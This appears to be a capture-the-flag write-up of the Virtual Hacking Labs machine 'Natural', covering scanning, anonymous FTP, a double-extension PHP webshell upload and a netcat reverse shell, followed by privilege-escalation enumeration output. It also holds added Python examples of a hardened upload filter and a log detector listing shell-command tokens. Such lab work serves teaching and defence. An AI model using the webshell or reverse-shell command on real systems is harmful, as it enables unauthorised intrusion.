VHL — Natural
Misc · Easy · Linux
FTP anonymous login exposes web application files. Abused file write via FTP to upload a PHP webshell for initial access.
February 12, 2025 · Virtual Hacking Labs
#FTP #Anonymous Login #Web Shell #PHP
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.77
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 21:14 EST
Nmap scan report for 10.11.1.77
Host is up (0.022s latency).
Not shown: 65528 closed tcp ports (reset), 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 4096 Mar 22 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.2.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 68:6a:dc:e1:41:57:e1:0d:07:d6:69:cd:6f:da:17:bf (DSA)
|_ 2048 ae:8d:d1:b5:ed:d3:e1:52:6b:d6:f7:95:ff:39:5d:e5 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Natural Design & Development - Home
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.2.15 ((CentOS))
|_http-title: Natural Design & Development - Home
|_ssl-date: 2025-02-13T02:14:36+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=natural/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-10-02T15:23:02
|_Not valid after: 2018-10-02T15:23:02
|_http-server-header: Apache/2.2.15 (CentOS)
| http-methods:
|_ Potentially risky methods: TRACE
46904/tcp open status 1 (RPC #100024)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 2 hops
Service Info: OS: Unix
Host script results:
|_clock-skew: 2s
TRACEROUTE
HOP RTT ADDRESS
1 21.61 ms 10.11.1.77
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.04 seconds
21
sh
21/tcp open ftp vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 4096 Mar 22 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.2.2 - secure, fast, stable
|_End of status
sh
ftp anonymous@10.11.1.77
Connected to 10.11.1.77.
220 (vsFTPd 2.2.2)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||42671|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Mar 22 2017 pub
80
sh
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Natural Design & Development - Home
| http-methods:
|_ Potentially risky methods: TRACE
directory search
sh
feroxbuster --url http://10.11.1.77/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.11.1.77/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 10l 30w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 12w 1310c http://10.11.1.77/assets/img/favicon.ico
200 GET 268l 659w 10342c http://10.11.1.77/portfolio.html
200 GET 148l 383w 6625c http://10.11.1.77/contact.php
200 GET 7l 389w 38808c http://10.11.1.77/assets/js/jquery-ui-1.12.1.custom.min.js
200 GET 7l 641w 46653c http://10.11.1.77/assets/js/bootstrap.min.js
200 GET 51l 96w 1186c http://10.11.1.77/assets/css/nucleo-icons.css
200 GET 4l 66w 31000c http://10.11.1.77/assets/css/fa/css/font-awesome.min.css
200 GET 253l 893w 13457c http://10.11.1.77/aboutus.html
200 GET 340l 765w 9991c http://10.11.1.77/assets/js/pk.js
200 GET 275l 867w 13351c http://10.11.1.77/index.html
200 GET 1l 428w 24632c http://10.11.1.77/assets/js/tether.min.js
200 GET 4l 1298w 86659c http://10.11.1.77/assets/js/jquery-3.2.1.min.js
200 GET 6l 1643w 150997c http://10.11.1.77/assets/css/bootstrap.min.css
301 GET 9l 28w 310c http://10.11.1.77/uploads => http://10.11.1.77/uploads/
200 GET 214l 1152w 119081c http://10.11.1.77/assets/img/faces/john.jpg
301 GET 9l 28w 309c http://10.11.1.77/assets => http://10.11.1.77/assets/
200 GET 334l 2555w 291085c http://10.11.1.77/assets/img/faces/sophia.jpg
200 GET 10200l 23484w 234993c http://10.11.1.77/assets/css/pk.css
200 GET 451l 2517w 347721c http://10.11.1.77/assets/img/faces/crystal.jpg
200 GET 132l 558w 57774c http://10.11.1.77/assets/img/sections/18586.jpg
200 GET 151l 996w 125936c http://10.11.1.77/assets/img/sections/66942.jpg
200 GET 620l 3249w 257399c http://10.11.1.77/assets/img/sections/99592236.jpg
200 GET 275l 867w 13351c http://10.11.1.77/
200 GET 981l 1914w 132045c http://10.11.1.77/assets/img/sections/contact.jpg
200 GET 7l 1089w 51465c http://10.11.1.77/assets/js/moment.min.js
200 GET 113l 561w 55265c http://10.11.1.77/assets/img/sections/553942.jpg
200 GET 689l 2081w 22480c http://10.11.1.77/assets/js/bootstrap-tagsinput.js
200 GET 10l 138w 14920c http://10.11.1.77/assets/js/bootstrap-switch.min.js
200 GET 4l 66w 31000c http://10.11.1.77/assets/css/font-awesome.min.css
200 GET 2146l 8074w 58285c http://10.11.1.77/assets/js/nouislider.js
200 GET 6l 161w 16780c http://10.11.1.77/assets/js/jasny-bootstrap.min.js
200 GET 159l 373w 7509c http://10.11.1.77/assets/js/demo.js
200 GET 1897l 6193w 69944c http://10.11.1.77/assets/js/bootstrap-select.js
200 GET 492l 2096w 35145c http://10.11.1.77/assets/fonts/nucleo-icons.eot
200 GET 84l 467w 35945c http://10.11.1.77/assets/fonts/nucleo-icons.woff
200 GET 492l 2095w 34947c http://10.11.1.77/assets/fonts/nucleo-icons.ttf
200 GET 78l 442w 31090c http://10.11.1.77/assets/fonts/nucleo-icons.woff2
200 GET 73l 461w 44937c http://10.11.1.77/assets/img/sections/26578.jpg
200 GET 474l 2096w 148015c http://10.11.1.77/assets/img/sections/8384.jpg
200 GET 732l 3967w 472131c http://10.11.1.77/assets/img/sections/5726578.jpg
200 GET 136l 826w 75817c http://10.11.1.77/assets/img/sections/55469.jpg
200 GET 287l 1585w 229678c http://10.11.1.77/assets/img/sections/55369.jpg
404 GET 9l 33w 286c http://10.11.1.77/Reports%20List
404 GET 9l 33w 288c http://10.11.1.77/external%20files
404 GET 9l 33w 287c http://10.11.1.77/Style%20Library
404 GET 9l 33w 284c http://10.11.1.77/modern%20mom
404 GET 9l 34w 289c http://10.11.1.77/neuf%20giga%20photo
404 GET 9l 33w 288c http://10.11.1.77/Web%20References
404 GET 9l 33w 284c http://10.11.1.77/My%20Project
404 GET 9l 33w 284c http://10.11.1.77/Contact%20Us
404 GET 9l 33w 285c http://10.11.1.77/Donate%20Cash
404 GET 9l 33w 283c http://10.11.1.77/Home%20Page
404 GET 9l 33w 288c http://10.11.1.77/Planned%20Giving
404 GET 9l 33w 288c http://10.11.1.77/Press%20Releases
404 GET 9l 33w 288c http://10.11.1.77/Privacy%20Policy
404 GET 9l 33w 282c http://10.11.1.77/Site%20Map
404 GET 9l 33w 282c http://10.11.1.77/About%20Us
404 GET 9l 33w 286c http://10.11.1.77/Bequest%20Gift
404 GET 9l 33w 283c http://10.11.1.77/Gift%20Form
404 GET 9l 34w 290c http://10.11.1.77/Life%20Income%20Gift
404 GET 9l 33w 284c http://10.11.1.77/New%20Folder
404 GET 9l 33w 285c http://10.11.1.77/Site%20Assets
404 GET 9l 34w 285c http://10.11.1.77/What%20is%20New
[####################] - 41s 30088/30088 0s found:63 errors:0
[####################] - 41s 30000/30000 740/s http://10.11.1.77/
[####################] - 2s 30000/30000 17094/s http://10.11.1.77/assets/css/ => Directory listing
[####################] - 1s 30000/30000 44183/s http://10.11.1.77/assets/img/ => Directory listing
[####################] - 3s 30000/30000 11169/s http://10.11.1.77/assets/img/sections/ => Directory listing
[####################] - 2s 30000/30000 17483/s http://10.11.1.77/assets/js/ => Directory listing
[####################] - 2s 30000/30000 17241/s http://10.11.1.77/assets/img/faces/ => Directory listing
[####################] - 1s 30000/30000 21552/s http://10.11.1.77/assets/css/fa/ => Directory listing
[####################] - 1s 30000/30000 28736/s http://10.11.1.77/assets/ => Directory listing
[####################] - 0s 30000/30000 157895/s http://10.11.1.77/uploads/ => Directory listing
[####################] - 1s 30000/30000 39735/s http://10.11.1.77/assets/fonts/ => Directory listing
file upload

- add a double extension: the webshell is uploaded as dummy.pdf.php, which gets it past the extension check on the upload while Apache still runs it as PHP because the last extension is .php
- webshell body:
<?php system($_GET[0]);?>
- the uploaded file is then reachable under /uploads/, the directory feroxbuster found with listing enabled
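The double extension works because the upload filter and the web server disagree about which extension counts. The Python below is an added example, not code from the writeup or from the Natural site (its upload handler is never shown): naive_allows is one plausible filter that validates the first extension, and hardened_name is the corrected form. The allow-list, the file names and the random-rename policy are assumptions.

```python
"""Added example, not code from the writeup or from the target site: one
plausible upload filter that a double extension defeats, next to a
hardened version. The allow-list and file names are assumptions."""
import os
import re
import secrets
from typing import Optional

ALLOWED_EXTENSIONS = {"pdf", "png", "jpg"}      # assumed allow-list for the form


def naive_allows(filename: str) -> bool:
    """Vulnerable: validates the extension that follows the first dot.
    'dummy.pdf.php' passes because 'pdf' is allowed, yet Apache picks the
    handler from the last extension and runs the file as PHP."""
    parts = filename.split(".")
    if len(parts) < 2:
        return False
    return parts[1].lower() in ALLOWED_EXTENSIONS


def hardened_name(filename: str) -> Optional[str]:
    """Hardened: judge only the last extension, reject multi-dot names and
    odd characters, and replace the client's name with a random one so the
    attacker cannot predict the stored path. Returns None when the upload
    must be refused."""
    base = os.path.basename(filename)            # drop any directory part
    if base.count(".") != 1:
        return None                              # 'dummy.pdf.php' stops here
    stem, ext = base.rsplit(".", 1)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return None
    return f"{secrets.token_hex(16)}.{ext.lower()}"


if __name__ == "__main__":
    for name in ("report.pdf", "dummy.pdf.php", "shell.php"):
        print(f"{name:15} naive={naive_allows(name)!s:5} hardened={hardened_name(name)}")
```

Fixing the filter is only half of it: the upload directory should never execute scripts, so keep it outside the document root or, with mod_php, set `php_admin_flag engine off` in a `<Directory>` block for it, and turn off the directory listing feroxbuster found with `Options -Indexes`.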
reverse shell as apache
BURP
GET /uploads/dummy.pdf.php?0=busybox+nc+172.16.1.1+1234+-e+bash HTTP/1.1
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.77] 37341
whoami
apache
sh
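On the defensive side, the request above leaves a distinctive trace in the Apache access log. The detector below is an added example, not part of the writeup: it parses constructed combined-format log lines (the attacker and target addresses are the ones used in this writeup, everything else is made up) and flags a request when a script is fetched from the upload directory, when the file name carries a double extension, or when the decoded query string contains a shell command. The upload directory path and the command token list are assumptions.

```python
"""Added example, not part of the original writeup: a small detector for
Apache access-log lines that look like the webshell request above. The
log lines are constructed; only the two IP addresses come from the page."""
import os
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format, capturing only the fields the rules need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

UPLOAD_DIRS = ("/uploads/",)                       # assumption: where uploads land
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")
# Heuristic: command names or paths that have no business in a query string.
CMD_TOKENS = re.compile(
    r"(?<![\w/.-])(?:busybox|nc|ncat|bash|sh|wget|curl|python|perl)(?=\s|$)"
    r"|/bin/|/dev/tcp/",
    re.IGNORECASE,
)

# Constructed sample: two benign requests and the webshell call from the writeup.
SAMPLE_LOG = """\
10.11.1.100 - - [12/Feb/2025:21:20:03 -0500] "GET /portfolio.html HTTP/1.1" 200 10342 "-" "Mozilla/5.0"
10.11.1.100 - - [12/Feb/2025:21:20:09 -0500] "GET /uploads/brochure.pdf?page=2 HTTP/1.1" 200 52311 "-" "Mozilla/5.0"
172.16.1.1 - - [12/Feb/2025:21:31:44 -0500] "GET /uploads/dummy.pdf.php?0=busybox+nc+172.16.1.1+1234+-e+bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""


def classify(target: str) -> list[str]:
    """Return the reasons a request target looks like webshell use (empty if none)."""
    parts = urlsplit(target)
    path = unquote_plus(parts.path).lower()
    name = os.path.basename(path)
    reasons = []
    if path.startswith(UPLOAD_DIRS) and name.endswith(SCRIPT_EXTS):
        reasons.append("server-side script requested from an upload directory")
    if name.count(".") >= 2 and name.endswith(SCRIPT_EXTS):
        reasons.append("double extension ending in a script extension")
    if CMD_TOKENS.search(unquote_plus(parts.query)):   # '+' becomes a space here
        reasons.append("shell command in query string")
    return reasons


def analyze(log_text: str):
    """Return (client_ip, target, reasons) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                  # malformed line: skip rather than crash
        reasons = classify(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in analyze(SAMPLE_LOG):
        print(f"{ip} {target}\n  " + "\n  ".join(reasons))
```

The first rule is the one worth alerting on by itself: a 200 for any .php under an upload directory means the server is executing user-supplied content, whatever the query string says.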
python -c 'import pty; pty.spawn("/bin/bash")'
sh
bash-4.1$ uname -a
uname -a
Linux natural 2.6.32-696.10.3.el6.i686 #1 SMP Tue Sep 26 17:34:41 UTC 2017 i686 i686 i386 GNU/Linux
linux exploit suggester
The suggester rates candidates by version pattern only. CentOS backports fixes without bumping the upstream kernel version, so a "probable" hit such as dirtycow still has to be checked against the Red Hat version list the output links to before any time is spent on it.
sh
bash-4.1$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 2.6.32
Architecture: i386
Distribution: RHEL
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
Comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000367] sudopwn
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Download URL: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000367] Sudoer-to-root
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Tags: RHEL=7{sudo:1.8.6p7}
Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exposure: less probable
Tags: ubuntu=16.04.1
Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
[+] [CVE-2015-5287] abrt/sosreport-rhel7
Details: https://www.openwall.com/lists/oss-security/2015/12/01/1
Exposure: less probable
Tags: RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
[+] [CVE-2015-3315] raceabrt
Details: http://seclists.org/oss-sec/2015/q2/130
Exposure: less probable
Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
[+] [CVE-2015-3246] userhelper
Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt
Exposure: less probable
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Download URL: https://www.exploit-db.com/download/37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
[+] [CVE-2015-1862] newpid (abrt)
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Exposure: less probable
Tags: fedora=20
Download URL: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
[+] [CVE-2014-5119] __gconv_translit_find
Details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
Exposure: less probable
Tags: debian=6
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-2094] semtex
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: less probable
Tags: RHEL=6
Download URL: https://www.exploit-db.com/download/25444
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: less probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2011-1485] pkexec
Details: https://www.exploit-db.com/exploits/17942/
Exposure: less probable
Tags: RHEL=6,ubuntu=10.04|10.10
Download URL: https://www.exploit-db.com/download/17942
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: less probable
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: less probable
Tags: ubuntu=10.04
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
Details: https://www.exploit-db.com/exploits/15023/
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Download URL: https://www.exploit-db.com/download/15023
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: less probable
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-1146] reiserfs
Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://jon.oberheide.org/files/team-edward.py
linpeas
sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 2.6.32-696.10.3.el6.i686 (mockbuild@c1bl.rdu2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) ) #1 SMP Tue Sep 26 17:34:41 UTC 2017
LSB Version: :base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.9 (Final)
Release: 6.9
Codename: Final
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.6p3
sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gdb
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.6
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (i386) using readline 5.1
sh
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-x--- 1 root dbus 49K Apr 22 2015 /lib/dbus-1/dbus-daemon-launch-helper
-r-sr-xr-x 1 root root 14K Oct 4 2017 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 9.4K Oct 4 2017 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-rwsr-xr-x. 1 root root 35K May 10 2016 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x. 1 root root 73K May 10 2016 /usr/bin/gpasswd
---s--x--x. 1 root root 124K Jun 22 2017 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 18K Mar 17 2015 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rws--x--x. 1 root root 17K Mar 22 2017 /usr/bin/chfn ---> SuSE_9.3/10
---s--x---. 1 root stapusr 174K Mar 22 2017 /usr/bin/staprun
-rws--x--x. 1 root root 16K Mar 22 2017 /usr/bin/chsh
-rwsr-xr-x. 1 root root 68K May 10 2016 /usr/bin/chage
-rwsr-xr-x. 1 root root 50K Mar 21 2017 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x. 1 root root 58K Mar 22 2017 /usr/bin/ksu
-rwsr-xr-x. 1 root root 46K Aug 23 2016 /usr/bin/crontab
-rwsr-xr-x. 1 root root 26K Nov 23 2015 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rws--x--x. 1 root root 13K Jun 19 2017 /usr/libexec/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x. 1 root root 9.4K Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
-rwsr-xr-x. 1 root root 251K Aug 31 2017 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x. 1 abrt abrt 9.4K Mar 23 2017 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS
-r-s--x---. 1 root apache 11K Aug 15 2017 /usr/sbin/suexec
-rwsr-xr-x. 1 root root 6.9K May 30 2017 /usr/sbin/usernetctl
-rws--x--x 1 root root 36K Aug 22 2010 /usr/sbin/userhelper
-rwsr-xr-x. 1 root root 32K Mar 22 2017 /bin/ping6
-rwsr-xr-x. 1 root root 34K Mar 22 2017 /bin/su
